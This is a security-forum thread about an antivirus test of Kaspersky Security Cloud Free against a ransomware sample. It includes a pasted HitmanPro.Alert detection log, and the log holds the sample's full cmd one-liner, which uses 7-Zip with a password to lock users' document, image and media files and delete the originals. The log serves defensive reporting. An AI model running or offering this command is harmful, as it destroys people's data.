App Review Kaspersky Security Cloud Free vs Ransominator (default settings)

bayasdev · Apr 26, 2020

Kaspersky users: don't worry, you're already using a strong AV, this is just the 0day bypassing XYZ AV show, avoid running unknown files and stay safe!

Edit: typo

This test shows how an antivirus behaves with certain threats, in a specific environment and under certain conditions.
We encourage you to compare these results with others and take informed decisions on what security products to use.
Before buying an antivirus you should consider factors such as price, ease of use, compatibility, and support. Installing a free trial version allows an antivirus to be tested in everyday use before purchase.

stefanos · Apr 26, 2020

R.I.P. Kaspersky

CyberTech · Apr 26, 2020

cries in KSC FREE

stefanos · Apr 26, 2020

CyberTech said:
cries in KSC FREE

Eagerly waiting the like of harlan4096

stefanos · Apr 26, 2020

harlan4096

CyberTech · Apr 26, 2020

Well not against anyone just in general

I'm a WD user

DSD27 · Apr 26, 2020

CyberTech said:
Well not against anyone just in general I'm a WD user

Bypassing Windows Defender is the first thing hackers think about when creating new threats. People here say it's now heavier than almost all other free AVs, why do you use it?

CyberTech · Apr 26, 2020

Well i was tired that i chose good AV free and some bad it was a complicated im better stay with WD and OSA i think its all alright because i dont use any office as doc, pdf, etc, i think i would try use H_C instead of OSA (outdated and no update since then)

Xjoker · Apr 26, 2020

Try WiseVector and let me know! @WiseVector have a look.

marcopaone · Apr 26, 2020

Vitali Ortzi · Apr 26, 2020

Xenofon said:
Try WiseVector and let me know! @WiseVector have a look.

Capture

Image Capture hosted in ImgBB

ibb.co

Vitali Ortzi · Apr 26, 2020

Log Name: Application
Source: HitmanPro.Alert
Date: 27/04/2020 0:43:03
Event ID: 911
Task Category: Mitigation
Level: Error
Keywords: Classic
User: N/A
Computer: DESKTOP-9TB3DOM
Description:
Mitigation CryptoGuard
Timestamp 2020-04-26T21:43:03

Platform 10.0.17763/x64 v871 06_17%
PID 4132
Application C:\Program Files\7-Zip\7z.exe
Created 2020-03-17T07:34:42
Description 7-Zip Console 18.6

Filename C:\Program Files\7-Zip\7z.exe

Detection Generic.Ransom.C

1*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3
Created L0, Write T8620544 H8620196|^259 #1,2

2*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip
Opened L8619687, Read T8620032|100% H17239374|200%|^70365 #2,1

3 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\Definitions\IPSDefs\20200424.061\idspep.dat
Opened L237576, Read T238080|100% H237576|100%|^119672 #3

4 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 #4

5 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 #5

6 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 #6

7 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 #7

8 \Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip
Opened, Deleted L19238769 P4984 #9

9*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip.geminis3
Created L0, Write T19239424 H19239254|^236 P4984 #10,11

10*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip
Opened L19238769, Read T19238912|100% H38477538|200%|^181818 P4984 #11,10

11 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\Definitions\IPSDefs\20200424.061\idspep.dat
Opened L237576, Read T238080|100% H237576|100%|^119672 P4984 #12

12 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #13

13 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #14

14 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #15

15 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #16

16 \Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip
Opened, Deleted L4372785 P3368 #18

17*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip.geminis3
Created L0, Write T4373504 H4373093|^306 P3368 #19,20

18*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip
Opened L4372785, Read T4372992|100% H8745570|200%|^38398 P3368 #20,19

25*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (USA, Europe) (En,Fr,De).zip.geminis3
Created L0, Write T5794304 H5793920|^251 P1504 #28,29

26*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (USA, Europe) (En,Fr,De).zip
Opened L5793576, Read T5793792|100% H11587152|200%|^15566 P1504 #29,28

33*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (Japan).zip.geminis3
Created L0, Write T5743104 H5743005|^277 P5240 #38,39

34*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (Japan).zip
Opened L5742712, Read T5743104|100% H11485424|200%|^16437 P5240 #39,38

Loaded Modules (23)
-----------------------------------------------------------------------------
0000000000DD0000-0000000000E48000 7z.exe (Igor Pavlov),
Version: 18.6.0.0
00007FFB36470000-00007FFB3665D000 ntdll.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB32240000-00007FFB32358000 hmpalert.dll (SurfRight B.V.),
Version: 3.8.4.871
00007FFB36380000-00007FFB36433000 KERNEL32.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB32630000-00007FFB328C5000 KERNELBASE.dll (Microsoft Corporation),
Version: 10.0.17763.1158
000000006DA90000-000000006DB23000 SYSFER.DLL (Symantec Corporation),
Version: 14.2.5536.2100
000000006D670000-000000006D998000 IPSEng64.dll (Symantec Corporation),
Version: 17.2.1.16
00007FFB339F0000-00007FFB33A93000 ADVAPI32.dll (Microsoft Corporation),
Version: 10.0.17763.1131
00007FFB34710000-00007FFB347AE000 msvcrt.dll (Microsoft Corporation),
Version: 7.0.17763.475
00007FFB33F80000-00007FFB3401E000 sechost.dll (Microsoft Corporation),
Version: 10.0.17763.1075
00007FFB337E0000-00007FFB33902000 RPCRT4.dll (Microsoft Corporation),
Version: 10.0.17763.864
00007FFB337D0000-00007FFB337D8000 PSAPI.DLL (Microsoft Corporation),
Version: 10.0.17763.1
00007FFB35EF0000-00007FFB35FB4000 OLEAUT32.dll (Microsoft Corporation),
Version: 10.0.17763.914
00007FFB32CE0000-00007FFB32D80000 msvcp_win.dll (Microsoft Corporation),
Version: 10.0.17763.1
00007FFB32BE0000-00007FFB32CDA000 ucrtbase.dll (Microsoft Corporation),
Version: 10.0.17763.719
00007FFB33AA0000-00007FFB33DCC000 combase.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB32B60000-00007FFB32BDE000 bcryptPrimitives.dll (Microsoft Corporation),
Version: 10.0.17763.678
00007FFB36130000-00007FFB362C7000 USER32.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB32610000-00007FFB32630000 win32u.dll (Microsoft Corporation),
Version: 10.0.17763.1
00007FFB34180000-00007FFB341A9000 GDI32.dll (Microsoft Corporation),
Version: 10.0.17763.592
00007FFB334F0000-00007FFB33689000 gdi32full.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB34630000-00007FFB3465E000 IMM32.DLL (Microsoft Corporation),
Version: 10.0.17763.719
000000006D4C0000-000000006D665000 7z.dll (Igor Pavlov),
Version: 18.6.0.0

Process Trace
1 C:\Program Files\7-Zip\7z.exe [4132] 2020-04-26T21:43:03
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p32113 "C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3" "C:\Users\admin\Documents
2 C:\Windows\System32\cmd.exe [4380] 2020-04-26T21:42:57
C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p32113 "%d.geminis3" "%d"
3 C:\Users\admin\Desktop\InventarioBodega.exe [4388] 2020-04-26T21:42:57
4 C:\Windows\explorer.exe [4556] 2020-04-26T18:17:07
5 C:\Windows\System32\userinit.exe [4532] 2020-04-26T18:17:04 19.4s
6 C:\Windows\System32\winlogon.exe [736] 2020-04-26T18:14:56
winlogon.exe
7 C:\Windows\System32\smss.exe [636] 2020-04-26T18:14:55 518ms
\SystemRoot\System32\smss.exe 000000dc 00000084
8 C:\Windows\System32\smss.exe [392] 2020-04-26T18:14:29
\SystemRoot\System32\smss.exe

Dropped Files
1 C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3
Dropped by \Device\HarddiskVolume1\PROGRA~1\7-Zip\7z.exe [4132]
1 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm574B.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
2 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AA.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
3 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AB.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
4 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BB.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
5 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BC.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
6 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BD.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
7 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CE.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
8 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CF.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
9 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D0.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
10 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D1.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
11 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57E2.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
12 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5802.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
13 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5803.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
14 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5814.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
15 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5815.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
16 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
17 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
18 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
19 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
20 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
21 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
22 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
23 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
24 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
25 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
26 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
27 C:\Users\admin\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000136.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]

Thumbprints
5ea4a9f95efe0979bc5e8ff5137ee4ef035231fce07e136c41611e8a79c49f1c

Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="HitmanPro.Alert" />
<EventID Qualifiers="0">911</EventID>
<Level>2</Level>
<Task>9</Task>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime="2020-04-26T21:43:03.542132400Z" />
<EventRecordID>9047</EventRecordID>
<Channel>Application</Channel>
<Computer>DESKTOP-9TB3DOM</Computer>
<Security />
</System>
<EventData>
<Data>C:\Program Files\7-Zip\7z.exe</Data>
<Data>CryptoGuard</Data>
<Data>Mitigation CryptoGuard
Timestamp 2020-04-26T21:43:03

Platform 10.0.17763/x64 v871 06_17%
PID 4132
Application C:\Program Files\7-Zip\7z.exe
Created 2020-03-17T07:34:42
Description 7-Zip Console 18.6

Filename C:\Program Files\7-Zip\7z.exe

Detection Generic.Ransom.C

1*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3
Created L0, Write T8620544 H8620196|^259 #1,2

2*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip
Opened L8619687, Read T8620032|100% H17239374|200%|^70365 #2,1

3 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\Definitions\IPSDefs\20200424.061\idspep.dat
Opened L237576, Read T238080|100% H237576|100%|^119672 #3

4 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 #4

5 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 #5

6 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 #6

7 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 #7

8 \Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip
Opened, Deleted L19238769 P4984 #9

9*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip.geminis3
Created L0, Write T19239424 H19239254|^236 P4984 #10,11

10*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip
Opened L19238769, Read T19238912|100% H38477538|200%|^181818 P4984 #11,10

11 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\Definitions\IPSDefs\20200424.061\idspep.dat
Opened L237576, Read T238080|100% H237576|100%|^119672 P4984 #12

12 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #13

13 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #14

14 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #15

15 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #16

16 \Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip
Opened, Deleted L4372785 P3368 #18

17*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip.geminis3
Created L0, Write T4373504 H4373093|^306 P3368 #19,20

18*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip
Opened L4372785, Read T4372992|100% H8745570|200%|^38398 P3368 #20,19

25*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (USA, Europe) (En,Fr,De).zip.geminis3
Created L0, Write T5794304 H5793920|^251 P1504 #28,29

26*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (USA, Europe) (En,Fr,De).zip
Opened L5793576, Read T5793792|100% H11587152|200%|^15566 P1504 #29,28

33*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (Japan).zip.geminis3
Created L0, Write T5743104 H5743005|^277 P5240 #38,39

34*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (Japan).zip
Opened L5742712, Read T5743104|100% H11485424|200%|^16437 P5240 #39,38

Loaded Modules (23)
-----------------------------------------------------------------------------
0000000000DD0000-0000000000E48000 7z.exe (Igor Pavlov),
Version: 18.6.0.0
00007FFB36470000-00007FFB3665D000 ntdll.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB32240000-00007FFB32358000 hmpalert.dll (SurfRight B.V.),
Version: 3.8.4.871
00007FFB36380000-00007FFB36433000 KERNEL32.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB32630000-00007FFB328C5000 KERNELBASE.dll (Microsoft Corporation),
Version: 10.0.17763.1158
000000006DA90000-000000006DB23000 SYSFER.DLL (Symantec Corporation),
Version: 14.2.5536.2100
000000006D670000-000000006D998000 IPSEng64.dll (Symantec Corporation),
Version: 17.2.1.16
00007FFB339F0000-00007FFB33A93000 ADVAPI32.dll (Microsoft Corporation),
Version: 10.0.17763.1131
00007FFB34710000-00007FFB347AE000 msvcrt.dll (Microsoft Corporation),
Version: 7.0.17763.475
00007FFB33F80000-00007FFB3401E000 sechost.dll (Microsoft Corporation),
Version: 10.0.17763.1075
00007FFB337E0000-00007FFB33902000 RPCRT4.dll (Microsoft Corporation),
Version: 10.0.17763.864
00007FFB337D0000-00007FFB337D8000 PSAPI.DLL (Microsoft Corporation),
Version: 10.0.17763.1
00007FFB35EF0000-00007FFB35FB4000 OLEAUT32.dll (Microsoft Corporation),
Version: 10.0.17763.914
00007FFB32CE0000-00007FFB32D80000 msvcp_win.dll (Microsoft Corporation),
Version: 10.0.17763.1
00007FFB32BE0000-00007FFB32CDA000 ucrtbase.dll (Microsoft Corporation),
Version: 10.0.17763.719
00007FFB33AA0000-00007FFB33DCC000 combase.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB32B60000-00007FFB32BDE000 bcryptPrimitives.dll (Microsoft Corporation),
Version: 10.0.17763.678
00007FFB36130000-00007FFB362C7000 USER32.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB32610000-00007FFB32630000 win32u.dll (Microsoft Corporation),
Version: 10.0.17763.1
00007FFB34180000-00007FFB341A9000 GDI32.dll (Microsoft Corporation),
Version: 10.0.17763.592
00007FFB334F0000-00007FFB33689000 gdi32full.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB34630000-00007FFB3465E000 IMM32.DLL (Microsoft Corporation),
Version: 10.0.17763.719
000000006D4C0000-000000006D665000 7z.dll (Igor Pavlov),
Version: 18.6.0.0

Process Trace
1 C:\Program Files\7-Zip\7z.exe [4132] 2020-04-26T21:43:03
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p32113 "C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3" "C:\Users\admin\Documents
2 C:\Windows\System32\cmd.exe [4380] 2020-04-26T21:42:57
C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p32113 "%d.geminis3" "%d"
3 C:\Users\admin\Desktop\InventarioBodega.exe [4388] 2020-04-26T21:42:57
4 C:\Windows\explorer.exe [4556] 2020-04-26T18:17:07
5 C:\Windows\System32\userinit.exe [4532] 2020-04-26T18:17:04 19.4s
6 C:\Windows\System32\winlogon.exe [736] 2020-04-26T18:14:56
winlogon.exe
7 C:\Windows\System32\smss.exe [636] 2020-04-26T18:14:55 518ms
\SystemRoot\System32\smss.exe 000000dc 00000084
8 C:\Windows\System32\smss.exe [392] 2020-04-26T18:14:29
\SystemRoot\System32\smss.exe

Dropped Files
1 C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3
Dropped by \Device\HarddiskVolume1\PROGRA~1\7-Zip\7z.exe [4132]
1 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm574B.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
2 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AA.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
3 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AB.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
4 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BB.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
5 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BC.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
6 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BD.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
7 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CE.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
8 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CF.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
9 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D0.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
10 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D1.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
11 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57E2.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
12 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5802.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
13 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5803.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
14 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5814.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
15 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5815.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
16 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
17 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
18 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
19 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
20 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
21 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
22 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
23 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
24 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
25 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
26 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
27 C:\Users\admin\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000136.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]

Thumbprints
